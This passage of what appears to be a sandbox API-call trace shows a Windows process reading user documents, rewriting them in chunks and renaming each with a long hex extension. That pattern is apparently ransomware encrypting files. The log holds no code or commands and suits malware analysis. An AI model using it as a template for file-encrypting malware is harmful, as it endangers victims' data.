(FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x741d418, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0166.808] CloseHandle (hObject=0x598) returned 1 [0166.809] GetProcessHeap () returned 0x270000 [0166.812] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.812] RtlInterlockedCompareExchange64 () returned 0x1 [0166.812] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.815] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.816] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.818] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.819] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\MGINEBCK3IRXog.odt", lpString2=".08E36FEEF6C8F3F5DE899B87CE8B8874EC64E29E61ACD72BC71DE256C057D62E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\MGINEBCK3IRXog.odt.08E36FEEF6C8F3F5DE899B87CE8B8874EC64E29E61ACD72BC71DE256C057D62E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\MGINEBCK3IRXog.odt.08E36FEEF6C8F3F5DE899B87CE8B8874EC64E29E61ACD72BC71DE256C057D62E" [0166.819] GetProcessHeap () returned 0x270000 [0166.819] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x134) returned 0x42631b8 [0166.819] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x42631b8, Length=0x134, FileInformationClass=0xa) returned 0x0 [0166.821] CloseHandle (hObject=0x598) returned 1 [0166.821] GetProcessHeap () returned 0x270000 [0166.822] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.823] RtlInterlockedCompareExchange64 () returned 0x1 [0166.823] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.845] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.846] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.862] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.864] RtlInterlockedCompareExchange64 () returned 0x0 [0166.864] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.881] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.883] RtlInterlockedCompareExchange64 () returned 0x0 [0166.883] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.897] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.898] RtlInterlockedCompareExchange64 () returned 0x0 [0166.898] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.911] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.912] RtlInterlockedCompareExchange64 () returned 0x0 [0166.912] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.940] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.941] RtlInterlockedCompareExchange64 () returned 0x0 [0166.941] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.954] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.955] RtlInterlockedCompareExchange64 () returned 0x0 [0166.955] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.967] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.969] RtlInterlockedCompareExchange64 () returned 0x0 [0166.969] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.980] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.981] RtlInterlockedCompareExchange64 () returned 0x0 [0166.981] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.993] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x7200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.994] RtlInterlockedCompareExchange64 () returned 0x0 [0166.994] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.009] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x7200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.010] RtlInterlockedCompareExchange64 () returned 0x0 [0167.010] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.021] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x6e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.022] RtlInterlockedCompareExchange64 () returned 0x0 [0167.022] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.041] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.044] RtlInterlockedCompareExchange64 () returned 0x0 [0167.044] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.179] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.181] RtlInterlockedCompareExchange64 () returned 0x0 [0167.181] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.230] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0167.231] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\rW24XMo g3EfMKuXFXbo.docx", lpString2=".37AAA64B8CFF5D745FA191F95E033766E05FF0CAA9A6A05282570072EC6F2569" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\rW24XMo g3EfMKuXFXbo.docx.37AAA64B8CFF5D745FA191F95E033766E05FF0CAA9A6A05282570072EC6F2569") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\rW24XMo g3EfMKuXFXbo.docx.37AAA64B8CFF5D745FA191F95E033766E05FF0CAA9A6A05282570072EC6F2569" [0167.231] GetProcessHeap () returned 0x270000 [0167.231] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x741ddd8 [0167.231] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x741ddd8, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0167.235] CloseHandle (hObject=0x5ac) returned 1 [0167.235] GetProcessHeap () returned 0x270000 [0167.236] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.236] RtlInterlockedCompareExchange64 () returned 0x1 [0167.237] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.240] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.241] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.243] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0167.244] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\skHn.docx", lpString2=".25E21F871A7C1D5F8778D88A3A3000F5FC1E03490ACDC7BEE974619C11014C44" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\skHn.docx.25E21F871A7C1D5F8778D88A3A3000F5FC1E03490ACDC7BEE974619C11014C44") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\skHn.docx.25E21F871A7C1D5F8778D88A3A3000F5FC1E03490ACDC7BEE974619C11014C44" [0167.244] GetProcessHeap () returned 0x270000 [0167.244] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10c) returned 0x4267710 [0167.245] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x4267710, Length=0x10c, FileInformationClass=0xa) returned 0x0 [0167.247] CloseHandle (hObject=0x5ac) returned 1 [0167.248] GetProcessHeap () returned 0x270000 [0167.250] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.250] RtlInterlockedCompareExchange64 () returned 0x1 [0167.250] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.255] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.255] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.257] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0167.258] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\VO8vnxVyqWP zR.xlsx", lpString2=".C991FA1CF7B8D92AB9A7B22CFCECD6558C69EFF543629B700C680E33EA996419" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\VO8vnxVyqWP zR.xlsx.C991FA1CF7B8D92AB9A7B22CFCECD6558C69EFF543629B700C680E33EA996419") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\VO8vnxVyqWP zR.xlsx.C991FA1CF7B8D92AB9A7B22CFCECD6558C69EFF543629B700C680E33EA996419" [0167.258] GetProcessHeap () returned 0x270000 [0167.258] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x42f9410 [0167.259] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f9410, Length=0x120, FileInformationClass=0xa) returned 0x0 [0167.261] CloseHandle (hObject=0x5ac) returned 1 [0167.262] GetProcessHeap () returned 0x270000 [0167.263] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.263] RtlInterlockedCompareExchange64 () returned 0x1 [0167.264] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.268] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.269] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.271] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0167.272] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\wi9CmCQ.pptx", lpString2=".E0EA8B580AA9208AD9719CE3DB634E439807CD955C3FBFB5CA700440FB1BCC75" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\wi9CmCQ.pptx.E0EA8B580AA9208AD9719CE3DB634E439807CD955C3FBFB5CA700440FB1BCC75") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\wi9CmCQ.pptx.E0EA8B580AA9208AD9719CE3DB634E439807CD955C3FBFB5CA700440FB1BCC75" [0167.272] GetProcessHeap () returned 0x270000 [0167.272] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x112) returned 0x42f9538 [0167.272] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f9538, Length=0x112, FileInformationClass=0xa) returned 0x0 [0167.275] CloseHandle (hObject=0x5ac) returned 1 [0167.277] GetProcessHeap () returned 0x270000 [0167.278] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.278] RtlInterlockedCompareExchange64 () returned 0x1 [0167.278] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.283] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.283] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.285] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0167.286] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\zgPO1s6dkb.docx", lpString2=".990565ED7914417A4C0504946FAC92F0C52C7776E7470C28E6C0BB1F2B854B5A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\zgPO1s6dkb.docx.990565ED7914417A4C0504946FAC92F0C52C7776E7470C28E6C0BB1F2B854B5A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\zgPO1s6dkb.docx.990565ED7914417A4C0504946FAC92F0C52C7776E7470C28E6C0BB1F2B854B5A" [0167.286] GetProcessHeap () returned 0x270000 [0167.286] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x118) returned 0x42f9660 [0167.287] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f9660, Length=0x118, FileInformationClass=0xa) returned 0x0 [0167.289] CloseHandle (hObject=0x5ac) returned 1 [0167.289] GetProcessHeap () returned 0x270000 [0167.291] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.291] RtlInterlockedCompareExchange64 () returned 0x1 [0167.291] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.295] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.296] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.298] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0167.300] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\zHVfqFS9ZJabb9iU.xlsx", lpString2=".207150A3785CCE8CDDA2A8584946239F3B28D75D66911ACF7A8BD479FA788973" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\zHVfqFS9ZJabb9iU.xlsx.207150A3785CCE8CDDA2A8584946239F3B28D75D66911ACF7A8BD479FA788973") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\zHVfqFS9ZJabb9iU.xlsx.207150A3785CCE8CDDA2A8584946239F3B28D75D66911ACF7A8BD479FA788973" [0167.300] GetProcessHeap () returned 0x270000 [0167.300] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x124) returned 0x741df10 [0167.300] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x741df10, Length=0x124, FileInformationClass=0xa) returned 0x0 [0167.303] CloseHandle (hObject=0x5ac) returned 1 [0167.304] GetProcessHeap () returned 0x270000 [0167.306] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.306] RtlInterlockedCompareExchange64 () returned 0x1 [0167.306] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.312] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.312] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.320] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0167.322] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\ZSOjcpxzwxusjl.pdf", lpString2=".C9BC486F65C158551624BBF6A40D59302E0D92A78717F7FFA37D429764B56C7D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\ZSOjcpxzwxusjl.pdf.C9BC486F65C158551624BBF6A40D59302E0D92A78717F7FFA37D429764B56C7D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\ZSOjcpxzwxusjl.pdf.C9BC486F65C158551624BBF6A40D59302E0D92A78717F7FFA37D429764B56C7D" [0167.323] GetProcessHeap () returned 0x270000 [0167.323] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x42f9788 [0167.323] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f9788, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0167.329] CloseHandle (hObject=0x5ac) returned 1 [0167.330] GetProcessHeap () returned 0x270000 [0167.331] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.331] RtlInterlockedCompareExchange64 () returned 0x1 [0167.331] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.831] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, 